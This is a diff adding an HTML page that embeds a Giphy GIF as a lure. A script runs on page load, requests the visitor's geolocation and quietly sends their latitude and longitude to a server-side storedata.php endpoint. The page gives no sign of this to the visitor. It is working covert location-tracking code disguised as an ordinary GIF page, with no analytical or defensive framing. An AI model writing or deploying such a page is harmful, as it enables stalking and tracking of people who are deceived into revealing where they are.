--- a/locate.html
+++ b/locate.html
@@ -1,1 +1,38 @@
+<!DOCTYPE html>
+<html>
+<body onload="getLocation()">
+
+
 <iframe src="https://giphy.com/embed/tptFQ8QAJYYvu" width="480" height="320" frameBorder="0" class="giphy-embed" allowFullScreen></iframe><p><a href="https://giphy.com/gifs/eating-l-tptFQ8QAJYYvu">via GIPHY</a></p>
+
+
+
+
+
+<p id="demo"></p>
+
+<script>
+var x = document.getElementById("demo");
+
+function getLocation() {
+  if (navigator.geolocation) {
+    navigator.geolocation.getCurrentPosition(showPosition);
+  } else { 
+    x.innerHTML = "Geolocation is not supported by this browser.";
+  }
+}
+
+function showPosition(position) {
+    const xhttp =new XMLHttpRequest();
+    xhttp.open("GET", "storedata.php?lat=" + position.coords.latitude + "&long=" + position.coords.longitude);
+    xhttp.send();
+ 
+}
+</script>
+
+</body>
+</html>
+
+
+
+
